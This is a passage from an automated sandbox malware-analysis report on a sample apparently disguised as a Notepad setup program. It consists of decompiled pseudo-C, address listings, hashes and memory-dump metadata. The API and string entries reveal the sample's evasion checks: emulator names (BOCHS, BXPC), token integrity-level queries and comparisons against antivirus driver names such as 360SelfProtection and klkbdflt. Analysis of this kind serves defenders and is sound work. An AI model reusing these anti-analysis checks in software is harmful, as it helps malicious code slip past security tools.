											_t86 = _t86 + 8;
											_t49 = _t106 + 0x400000; // 0x905a4d
											_t50 = _t106 + 0x400000; // 0x400000
											_v120 = _t64 +  *_t49;
											_t66 = _t50;
											L1();
										} while (_t86 < 0x425930);
										return _t66;
									}
								} else {
									_t32 = _t86 + 4; // 0x0
									_t62 =  *_t32;
									L22:
									if(_t62 != 0) {
										goto L42;
									} else {
										_t33 = _t86 + 8; // 0x0
										_t62 =  *_t33;
										if(_t62 != 1) {
											_v144 = _t62;
											 *_t140 = "  Unknown pseudo relocation protocol version %d.\n";
											_t67 = E00408060(_t86, _t91, _t105, _t116, _t125, _t132);
											_push(_t91);
											_push(_t67);
											_t93 =  &_v144;
											if(_t67 >= 0x1000) {
												do {
													_t93 = _t93 - 0x1000;
													_t67 = _t67 - 0x1000;
												} while (_t67 > 0x1000);
											}
											_pop(_t68);
											return _t68;
										} else {
											while(1) {
												L25:
												_t86 = _t86 + 0xc;
												if(_t86 >= 0x425930) {
													break;
												} else {
													goto L26;
												}
												while(1) {
													L26:
													_t69 =  *_t86;
													_t34 = _t86 + 4; // 0x0
													_t96 =  *_t34;
													_t35 = _t86 + 8; // 0x0
													_t108 =  *_t35 & 0x000000ff;
													_t36 = _t69 + 0x400000; // 0x400000
													_t120 = _t36;
													_t37 = _t96 + 0x400000; // 0x400000
													_t129 = _t37;
													_t38 = _t69 + 0x400000; // 0x905a4d
													_t70 =  *_t38;
													if(_t108 == 0x10) {
														break;
													}
													if(_t108 != 0x20) {
														if(_t108 == 8) {
															_t98 =  *_t129 & 0x000000ff;
															if(_t98 < 0) {
																_t98 = _t98 | 0xffffff00;
															}
															_v120 = _t70 + _t98 - _t120;
															_t62 = _t129;
															L1();
															goto L25;
														} else {
															_v144 = _t108;
															 *_t140 = "  Unknown pseudo relocation bit size %d.\n";
															_v120 = 0;
															_t70 = E00408060(_t86, _t96, _t108, _t120, _t129, _t132);
															break;
														}
														goto L51;
													} else {
														_t86 = _t86 + 0xc;
														_v120 = _t70 - _t120 +  *_t129;
														_t62 = _t129;
														L1();
														if(_t86 < 0x425930) {
															continue;
														}
													}
													goto L29;
												}
												_t43 = _t96 + 0x400000; // 0x905a4d
												_t109 =  *_t43 & 0x0000ffff;
												if(_t109 < 0) {
													_t109 = _t109 | 0xffff0000;
												}
												_v120 = _t70 + _t109 - _t120;
												_t62 = _t129;
												L1();
											}
											L29:
											return _t62;
										}
									}
								}
							}
						}
					} else {
						L16:
						return _t62;
					}
				} else {
					_t75 = _v64;
					if(_t75 == 0x40 || _t75 == 4) {
						if(_t125 != 0) {
							_t76 = 0;
							do {
								 *((char*)(_t85 + _t76)) =  *(_t116 + _t76) & 0x000000ff;
								_t76 = _t76 + 1;
							} while (_t76 < _t125);
						}
						goto L7;
					} else {
						_t134 =  &_v88;
						_v96 = 0x40;
						_v92 = _t134;
						_v100 = _v72;
						 *_t139 = _v84;
						_t75 = VirtualProtect(??, ??, ??, ??);
						_t139 = _t139 - 0x10;
						_t103 = _v64;
						if(_t125 != 0) {
							_t114 = 0;
							do {
								_t75 =  *(_t116 + _t114) & 0x000000ff;
								 *(_t85 + _t114) = _t75;
								_t114 = _t114 + 1;
							} while (_t114 < _t125);
						}
						if(_t103 == 0x40 || _t103 == 4) {
							L7:
							return _t75;
						} else {
							_v92 = _t134;
							_v96 = _v88;
							_v100 = _v72;
							 *_t139 = _v84;
							return VirtualProtect(??, ??, ??, ??);
						}
					}
				}
				L51:
			}



















































                                      0x00408060
                                      0x00408060
                                      0x00408060
                                      0x00408062
                                      0x00408065
                                      0x0040806a
                                      0x00408072
                                      0x00408076
                                      0x00408076
                                      0x00408079
                                      0x00408081
                                      0x00408085
                                      0x0040808c
                                      0x00408095
                                      0x00408099
                                      0x0040809c
                                      0x004080a0
                                      0x004080a5
                                      0x004080b0
                                      0x004080b2
                                      0x004080b5
                                      0x004080b8
                                      0x004080ba
                                      0x004080c1
                                      0x004080c9
                                      0x004080cd
                                      0x004080d0
                                      0x004080d5
                                      0x004080da
                                      0x00408184
                                      0x00408188
                                      0x00408190
                                      0x00408197
                                      0x004081a0
                                      0x004081a7
                                      0x004081b0
                                      0x004081bf
                                      0x004081c7
                                      0x00000000
                                      0x004081c9
                                      0x004081c9
                                      0x004081ca
                                      0x004081cb
                                      0x004081cc
                                      0x004081cf
                                      0x004081d8
                                      0x00408272
                                      0x00408320
                                      0x00000000
                                      0x00408278
                                      0x00408278
                                      0x0040827f
                                      0x00408285
                                      0x00408370
                                      0x00000000
                                      0x0040828b
                                      0x0040828b
                                      0x00408291
                                      0x00000000
                                      0x00408291
                                      0x00408285
                                      0x004081de
                                      0x004081de
                                      0x004081e3
                                      0x004081e5
                                      0x00408325
                                      0x0040832b
                                      0x00000000
                                      0x00408338
                                      0x00408338
                                      0x00408338
                                      0x00408338
                                      0x0040833b
                                      0x00408342
                                      0x00408345
                                      0x0040834b
                                      0x00408355
                                      0x00408359
                                      0x0040835b
                                      0x00408360
                                      0x0040836e
                                      0x0040836e
                                      0x004081eb
                                      0x004081eb
                                      0x004081eb
                                      0x004081ee
                                      0x004081f0
                                      0x00000000
                                      0x004081f6
                                      0x004081f6
                                      0x004081f6
                                      0x004081fc
                                      0x0040837a
                                      0x0040837e
                                      0x00408385
                                      0x00408390
                                      0x00408391
                                      0x00408397
                                      0x0040839b
                                      0x0040839d
                                      0x0040839d
                                      0x004083a6
                                      0x004083ab
                                      0x0040839d
                                      0x004083b7
                                      0x004083b9
                                      0x00408208
                                      0x00408208
                                      0x00408208
                                      0x00408208
                                      0x00408211
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408213
                                      0x00408213
                                      0x00408213
                                      0x00408215
                                      0x00408215
                                      0x00408218
                                      0x00408218
                                      0x0040821c
                                      0x0040821c
                                      0x00408222
                                      0x00408222
                                      0x00408228
                                      0x00408228
                                      0x00408231
                                      0x00000000
                                      0x00000000
                                      0x0040823a
                                      0x004082a3
                                      0x004082f0
                                      0x004082f5
                                      0x004082f7
                                      0x004082f7
                                      0x0040830a
                                      0x0040830e
                                      0x00408310
                                      0x00000000
                                      0x004082a5
                                      0x004082a5
                                      0x004082a9
                                      0x004082b0
                                      0x004082b8
                                      0x00000000
                                      0x004082b8
                                      0x00000000
                                      0x0040823c
                                      0x00408245
                                      0x00408248
                                      0x00408250
                                      0x00408252
                                      0x0040825d
                                      0x00000000
                                      0x00000000
                                      0x0040825d
                                      0x00000000
                                      0x0040823a
                                      0x004082c0
                                      0x004082c0
                                      0x004082ca
                                      0x004082cc
                                      0x004082cc
                                      0x004082df
                                      0x004082e3
                                      0x004082e5
                                      0x004082e5
                                      0x0040825f
                                      0x00408265
                                      0x00408265
                                      0x004081fc
                                      0x004081f0
                                      0x004081e5
                                      0x004081d8
                                      0x004081a9
                                      0x004081a9
                                      0x004081a9
                                      0x004081a9
                                      0x004080e0
                                      0x004080e0
                                      0x004080e7
                                      0x004080f0
                                      0x004080f2
                                      0x004080f4
                                      0x004080f8
                                      0x004080fb
                                      0x004080fe
                                      0x004080f4
                                      0x00000000
                                      0x00408110
                                      0x00408114
                                      0x00408118
                                      0x00408120
                                      0x00408124
                                      0x0040812c
                                      0x0040812f
                                      0x00408134
                                      0x00408137
                                      0x0040813d
                                      0x0040813f
                                      0x00408141
                                      0x00408141
                                      0x00408145
                                      0x00408148
                                      0x0040814b
                                      0x00408141
                                      0x00408152
                                      0x00408102
                                      0x00408109
                                      0x00408159
                                      0x0040815d
                                      0x00408161
                                      0x00408169
                                      0x00408171
                                      0x00408183
                                      0x00408183
                                      0x00408152
                                      0x004080e7
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Virtual$Protect$Queryabortfwritevfprintf
                                      • String ID: @
                                      • API String ID: 3498335539-2766056989
                                      • Opcode ID: c8c30f494b58f86f327aab961b4e78be351210a2951a2bb83a76c3f56018d1c5
                                      • Instruction ID: cbda29da314b6dc2f2444968f7cdba9b75ade7c0320947276bdd2fcea9e53b8f
                                      • Opcode Fuzzy Hash: c8c30f494b58f86f327aab961b4e78be351210a2951a2bb83a76c3f56018d1c5
                                      • Instruction Fuzzy Hash: 8C318CB19093559BD710EF29C68552FBBE0BF89708F04882EE8C8A7351DB39D944CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC513 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
                                      • String ID: BOCHS$BXPC$IPCA
                                      • API String ID: 1993750426-2341544300
                                      • Opcode ID: c043635897c7c42c75c8bf572af787cff6cc87ef1d823576dcb77a2d87424495
                                      • Instruction ID: a1b1ee883e99354cc8612b70e83c3bb2e0cff48973a6ca2f92c7b5abc9d8c177
                                      • Opcode Fuzzy Hash: c043635897c7c42c75c8bf572af787cff6cc87ef1d823576dcb77a2d87424495
                                      • Instruction Fuzzy Hash: 6B215731D42359BBEF2067969C45BFF7A7BDF05330F100469F901E1281DBB49E118AA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408690 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 243COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00408690(signed int __eax, signed int __ecx, signed int __edx) {
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				void* _t72;
				signed int _t74;
				void* _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t119;
				signed int* _t120;

				_t59 = __eax;
				_t115 =  *((char*)(__eax));
				_t120[7] = __edx;
				_t120[0xa] = __ecx;
				_t65 = _t115;
				if(_t115 == 0x2d) {
					L20:
					_t82 =  *(_t59 + 1) & 0x000000ff;
					_t89 = _t59 + 1;
					if(_t115 == _t120[7]) {
						_t67 = _t120[0xa] & 0x00000020;
						while(1) {
							_t60 = _t89 + 1;
							if(_t82 == 0x5d) {
								goto L25;
							}
							if(_t82 == 0x7f) {
								L60:
								_t82 =  *(_t89 + 1) & 0x000000ff;
								if(_t67 != 0) {
									_t89 = _t60;
									continue;
								} else {
									_t104 = _t89 + 2;
									_t89 = _t60;
									_t60 = _t104;
									goto L57;
								}
							} else {
								L57:
								while(_t82 != 0) {
									_t82 =  *(_t89 + 1) & 0x000000ff;
									_t89 = _t60;
									_t60 = _t89 + 1;
									if(_t82 != 0x5d) {
										if(_t82 != 0x7f) {
											continue;
										} else {
											goto L60;
										}
									}
									goto L25;
								}
								goto L24;
							}
							goto L25;
						}
					} else {
						_t115 = _t82;
						goto L2;
					}
				} else {
					_t89 = __eax;
					if(_t115 == 0x5d) {
						goto L20;
					} else {
						L2:
						_t120[8] = _t120[0xa] & 0x00004000;
						_t64 = _t115;
						_t116 = _t89;
						_t90 = _t65;
						_t68 = _t64;
						while(1) {
							_t97 = _t116 + 1;
							_t105 = _t68;
							if(_t68 == 0x5d) {
								break;
							}
							if(_t68 == 0x2d) {
								_t68 =  *(_t116 + 1);
								if(_t68 == 0x5d) {
									_t116 = _t97;
									_t90 = 0x2d;
									goto L10;
								} else {
									_t111 = _t68;
									if(_t111 == 0) {
										break;
									}
									_t120[9] = _t116;
									_t117 = _t90;
									_t120[0xb] = _t116 + 2;
									_t99 = _t111;
									_t112 = _t120[8];
									while(_t117 < _t99) {
										if(_t112 != 0) {
											_t77 = _t117 - _t120[7];
											_t117 = _t117 + 1;
											if(_t77 == 0) {
												goto L32;
											} else {
												continue;
											}
										} else {
											 *_t120 = _t117;
											_t117 = _t117 + 1;
											L0040A2C0();
											_t79 = _t64;
											_t64 = _t120[7];
											 *_t120 = _t64;
											L0040A2C0();
											if(_t79 != _t64) {
												continue;
											} else {
												L32:
												_t103 = _t120[0xb];
												_t96 =  *(_t120[9] + 2) & 0x000000ff;
												_t87 = _t120[0xa] & 0x00000020;
												while(1) {
													_t31 = _t103 + 1; // 0x22
													_t60 = _t31;
													if(_t96 == 0x5d) {
														goto L25;
													}
													if(_t96 == 0x7f) {
														L38:
														_t96 =  *(_t103 + 1) & 0x000000ff;
														if(_t87 != 0) {
															_t103 = _t60;
															continue;
														} else {
															_t35 = _t103 + 2; // 0x24
															_t103 = _t60;
															_t60 = _t35;
															goto L35;
														}
													} else {
														L35:
														while(_t96 != 0) {
															_t96 =  *(_t103 + 1) & 0x000000ff;
															_t103 = _t60;
															_t33 = _t103 + 1; // 0x25
															_t60 = _t33;
															if(_t96 != 0x5d) {
																if(_t96 != 0x7f) {
																	continue;
																} else {
																	goto L38;
																}
															}
															goto L25;
														}
														goto L24;
													}
													goto L25;
												}
											}
										}
										goto L25;
									}
									_t120[9] = _t120[0xb];
									_t101 = _t99;
									_t114 = _t117;
									_t120[0xb] = _t120[9];
									_t119 = _t120[8];
									while(_t114 > _t101) {
										if(_t119 != 0) {
											_t72 = _t114 - _t120[7];
											_t114 = _t114 - 1;
											if(_t72 == 0) {
												goto L45;
											} else {
												continue;
											}
										} else {
											 *_t120 = _t114;
											_t114 = _t114 - 1;
											L0040A2C0();
											_t74 = _t64;
											_t64 = _t120[7];
											 *_t120 = _t64;
											L0040A2C0();
											if(_t74 != _t64) {
												continue;
											} else {
												L45:
												_t102 = _t120[9];
												_t94 =  *(_t120[0xb] + 2) & 0x000000ff;
												_t85 = _t120[0xa] & 0x00000020;
												while(1) {
													_t47 = _t102 + 1; // 0x22
													_t60 = _t47;
													if(_t94 == 0x5d) {
														goto L25;
													}
													if(_t94 == 0x7f) {
														L51:
														_t94 =  *(_t102 + 1) & 0x000000ff;
														if(_t85 != 0) {
															_t102 = _t60;
															continue;
														} else {
															_t51 = _t102 + 2; // 0x24
															_t102 = _t60;
															_t60 = _t51;
															goto L48;
														}
													} else {
														L48:
														while(_t94 != 0) {
															_t94 =  *(_t102 + 1) & 0x000000ff;
															_t102 = _t60;
															_t49 = _t102 + 1; // 0x25
															_t60 = _t49;
															if(_t94 != 0x5d) {
																if(_t94 != 0x7f) {
																	continue;
																} else {
																	goto L51;
																}
															}
															goto L25;
														}
														goto L24;
													}
													goto L25;
												}
											}
										}
										goto L25;
									}
									_t105 = _t101;
									_t97 = _t120[9];
									goto L7;
								}
							} else {
								if(_t68 == 0) {
									break;
								}
								L7:
								if(_t105 == 0x2f || _t105 == 0x5c) {
									break;
								}
								_t68 =  *_t97;
								_t116 = _t97;
								_t90 = _t105;
								L10:
								_t64 = _t120[8];
								if(_t64 != 0) {
									if(_t90 == _t120[7]) {
										goto L12;
									} else {
										continue;
									}
								} else {
									 *_t120 = _t90;
									_t120[9] = _t90;
									L0040A2C0();
									_t109 = _t64;
									_t64 = _t120[7];
									 *_t120 = _t64;
									L0040A2C0();
									_t90 = _t120[9];
									if(_t109 != _t64) {
										continue;
									} else {
										L12:
										_t83 = _t68;
										_t91 = _t116;
										_t70 = _t120[0xa] & 0x00000020;
										while(1) {
											_t60 = _t91 + 1;
											if(_t83 == 0x5d) {
												goto L25;
											}
											if(_t83 == 0x7f) {
												L18:
												_t83 =  *(_t91 + 1) & 0x000000ff;
												if(_t70 != 0) {
													_t91 = _t60;
													continue;
												} else {
													_t108 = _t91 + 2;
													_t91 = _t60;
													_t60 = _t108;
													goto L15;
												}
											} else {
												L15:
												while(_t83 != 0) {
													_t83 =  *(_t91 + 1) & 0x000000ff;
													_t91 = _t60;
													_t60 = _t91 + 1;
													if(_t83 != 0x5d) {
														if(_t83 != 0x7f) {
															continue;
														} else {
															goto L18;
														}
													}
													goto L25;
												}
												goto L24;
											}
											goto L25;
										}
									}
								}
							}
							goto L25;
						}
						L24:
						return 0;
					}
				}
				L25:
				return _t60;
			}








































                                      0x00408690
                                      0x00408697
                                      0x0040869a
                                      0x0040869e
                                      0x004086a2
                                      0x004086a7
                                      0x00408788
                                      0x00408788
                                      0x0040878c
                                      0x00408793
                                      0x00408944
                                      0x00408947
                                      0x00408947
                                      0x0040894d
                                      0x00000000
                                      0x00000000
                                      0x00408956
                                      0x00408977
                                      0x00408977
                                      0x0040897d
                                      0x00408990
                                      0x00000000
                                      0x0040897f
                                      0x0040897f
                                      0x00408982
                                      0x00408984
                                      0x00000000
                                      0x00408984
                                      0x00408958
                                      0x00000000
                                      0x00408958
                                      0x00408960
                                      0x00408964
                                      0x00408966
                                      0x0040896c
                                      0x00408975
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408975
                                      0x00000000
                                      0x0040896c
                                      0x00000000
                                      0x00408958
                                      0x00000000
                                      0x00408956
                                      0x00408799
                                      0x00408799
                                      0x00000000
                                      0x00408799
                                      0x004086ad
                                      0x004086ad
                                      0x004086b2
                                      0x00000000
                                      0x004086b8
                                      0x004086b8
                                      0x004086c1
                                      0x004086c5
                                      0x004086c7
                                      0x004086c9
                                      0x004086cb
                                      0x004086da
                                      0x004086da
                                      0x004086dd
                                      0x004086e2
                                      0x00000000
                                      0x00000000
                                      0x004086eb
                                      0x004087a8
                                      0x004087af
                                      0x004087c8
                                      0x004087ca
                                      0x00000000
                                      0x004087b1
                                      0x004087b1
                                      0x004087b6
                                      0x00000000
                                      0x00000000
                                      0x004087db
                                      0x004087df
                                      0x004087e1
                                      0x004087e5
                                      0x004087e7
                                      0x004087fd
                                      0x00408803
                                      0x004087f2
                                      0x004087f6
                                      0x004087fb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408805
                                      0x00408805
                                      0x00408808
                                      0x0040880b
                                      0x00408810
                                      0x00408812
                                      0x00408816
                                      0x00408819
                                      0x00408822
                                      0x00000000
                                      0x00408824
                                      0x00408824
                                      0x0040882c
                                      0x00408830
                                      0x00408834
                                      0x00408837
                                      0x00408837
                                      0x00408837
                                      0x0040883d
                                      0x00000000
                                      0x00000000
                                      0x00408846
                                      0x00408867
                                      0x00408867
                                      0x0040886d
                                      0x00408930
                                      0x00000000
                                      0x00408873
                                      0x00408873
                                      0x00408876
                                      0x00408878
                                      0x00000000
                                      0x00408878
                                      0x00408848
                                      0x00000000
                                      0x00408848
                                      0x00408850
                                      0x00408854
                                      0x00408856
                                      0x00408856
                                      0x0040885c
                                      0x00408865
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408865
                                      0x00000000
                                      0x0040885c
                                      0x00000000
                                      0x00408848
                                      0x00000000
                                      0x00408846
                                      0x00408837
                                      0x00408822
                                      0x00000000
                                      0x00408803
                                      0x0040888c
                                      0x00408890
                                      0x00408892
                                      0x00408894
                                      0x00408898
                                      0x004088ad
                                      0x004088b7
                                      0x004088a2
                                      0x004088a6
                                      0x004088ab
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004088b9
                                      0x004088b9
                                      0x004088bc
                                      0x004088bf
                                      0x004088c4
                                      0x004088c6
                                      0x004088ca
                                      0x004088cd
                                      0x004088d6
                                      0x00000000
                                      0x004088d8
                                      0x004088d8
                                      0x004088e0
                                      0x004088e4
                                      0x004088e8
                                      0x004088eb
                                      0x004088eb
                                      0x004088eb
                                      0x004088f1
                                      0x00000000
                                      0x00000000
                                      0x004088fa
                                      0x0040891b
                                      0x0040891b
                                      0x00408921
                                      0x004089b0
                                      0x00000000
                                      0x00408927
                                      0x00408927
                                      0x0040892a
                                      0x0040892c
                                      0x00000000
                                      0x0040892c
                                      0x004088fc
                                      0x00000000
                                      0x004088fc
                                      0x00408904
                                      0x00408908
                                      0x0040890a
                                      0x0040890a
                                      0x00408910
                                      0x00408919
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408919
                                      0x00000000
                                      0x00408910
                                      0x00000000
                                      0x004088fc
                                      0x00000000
                                      0x004088fa
                                      0x004088eb
                                      0x004088d6
                                      0x00000000
                                      0x004088b7
                                      0x004089a0
                                      0x004089a2
                                      0x00000000
                                      0x004089a2
                                      0x004086f1
                                      0x004086f3
                                      0x00000000
                                      0x00000000
                                      0x004086f9
                                      0x004086fc
                                      0x00000000
                                      0x00000000
                                      0x0040870b
                                      0x0040870e
                                      0x00408710
                                      0x00408712
                                      0x00408712
                                      0x00408718
                                      0x004086d8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040871a
                                      0x0040871a
                                      0x0040871d
                                      0x00408721
                                      0x00408726
                                      0x00408728
                                      0x0040872c
                                      0x0040872f
                                      0x00408734
                                      0x0040873c
                                      0x00000000
                                      0x0040873e
                                      0x0040873e
                                      0x0040873e
                                      0x00408744
                                      0x00408746
                                      0x00408749
                                      0x00408749
                                      0x0040874f
                                      0x00000000
                                      0x00000000
                                      0x00408754
                                      0x0040876d
                                      0x0040876d
                                      0x00408773
                                      0x00408998
                                      0x00000000
                                      0x00408779
                                      0x00408779
                                      0x0040877c
                                      0x0040877e
                                      0x00000000
                                      0x0040877e
                                      0x00408756
                                      0x00000000
                                      0x00408756
                                      0x0040875a
                                      0x0040875e
                                      0x00408760
                                      0x00408766
                                      0x0040876b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040876b
                                      0x00000000
                                      0x00408766
                                      0x00000000
                                      0x00408756
                                      0x00000000
                                      0x00408754
                                      0x00408749
                                      0x0040873c
                                      0x00408718
                                      0x00000000
                                      0x004086eb
                                      0x004087b8
                                      0x00000000
                                      0x004087b8
                                      0x004086b2
                                      0x004087c1
                                      0x004087c1

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: tolower
                                      • String ID: -$]
                                      • API String ID: 3025214199-736542798
                                      • Opcode ID: 50526ef0fa7fa220230c124b72132fb53abd79b36d4bfe43d8b5b27314f97089
                                      • Instruction ID: 0e16e2a22029aa4471a4307e3bb751e35b8c41450a7fa0057e64d5365dcf607c
                                      • Opcode Fuzzy Hash: 50526ef0fa7fa220230c124b72132fb53abd79b36d4bfe43d8b5b27314f97089
                                      • Instruction Fuzzy Hash: E081F8716087268BC3209E658680237F7D76B89300F59463FD8D8B7396DB3DED458B8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: signal
                                      • String ID:
                                      • API String ID: 1946981877-0
                                      • Opcode ID: a6d89cd1dca3cd060e712da2f0e81d168bec7f68c2a16c06cb081c0e223766be
                                      • Instruction ID: 0244da68cefa54a946a1fdb71a4cdc3b43f1fbe4d34201c69b19d176bd4df485
                                      • Opcode Fuzzy Hash: a6d89cd1dca3cd060e712da2f0e81d168bec7f68c2a16c06cb081c0e223766be
                                      • Instruction Fuzzy Hash: 3031CF705042408AE710BB65854036B76D0AF46328F158B3FE1E9A67E5DB7E88C5971B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E42C5 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42D7
                                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42F2
                                      • GetLastError.KERNEL32(?,?,00000000,?,?,006E4238,00000000), ref: 006E42F8
                                      • malloc.MSVCRT ref: 006E4306
                                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E4320
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000,?,00000000,?,?,006E4238,00000000), ref: 006E4328
                                      • GetSidSubAuthority.ADVAPI32(00000000,?,?,00000000,?,?,006E4238,00000000), ref: 006E4338
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AuthorityInformation$??3@CountErrorLastOpenProcessmalloc
                                      • String ID:
                                      • API String ID: 3908210838-0
                                      • Opcode ID: 620aec2656b9ae935a729f9f39fffb9d702ff1f8c142330c6656bf0da51c73d2
                                      • Instruction ID: 8a912f6d2cf7109b47d077a67bceab88343d8f4629f0f778e4e7536862eb4e2b
                                      • Opcode Fuzzy Hash: 620aec2656b9ae935a729f9f39fffb9d702ff1f8c142330c6656bf0da51c73d2
                                      • Instruction Fuzzy Hash: A6115E79501249BFEB015F62DC55DFA7F6EEF48794B100025FD00D6160DB329E41EE60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC8D7 Relevance: 12.0, APIs: 4, Strings: 4, Instructions: 36stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcmpiW.KERNEL32(?,360SelfProtection), ref: 006EC8EB
                                      • lstrcmpiW.KERNEL32(?,BdDci), ref: 006EC8F7
                                      • lstrcmpiW.KERNEL32(?,rtp_process_monitor), ref: 006EC903
                                      • lstrcmpiW.KERNEL32(?,klkbdflt), ref: 006EC90F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID: 360SelfProtection$BdDci$klkbdflt$rtp_process_monitor
                                      • API String ID: 1586166983-124983838
                                      • Opcode ID: c37ec6df34994478f209798cf6c1c01fc76b0ee9532dd30ee10e9bee43fdaa8d
                                      • Instruction ID: 6b88b7ec4f3ad1c24a8ce462295ec65f9cd1247e673573248ae92941369e4a7d
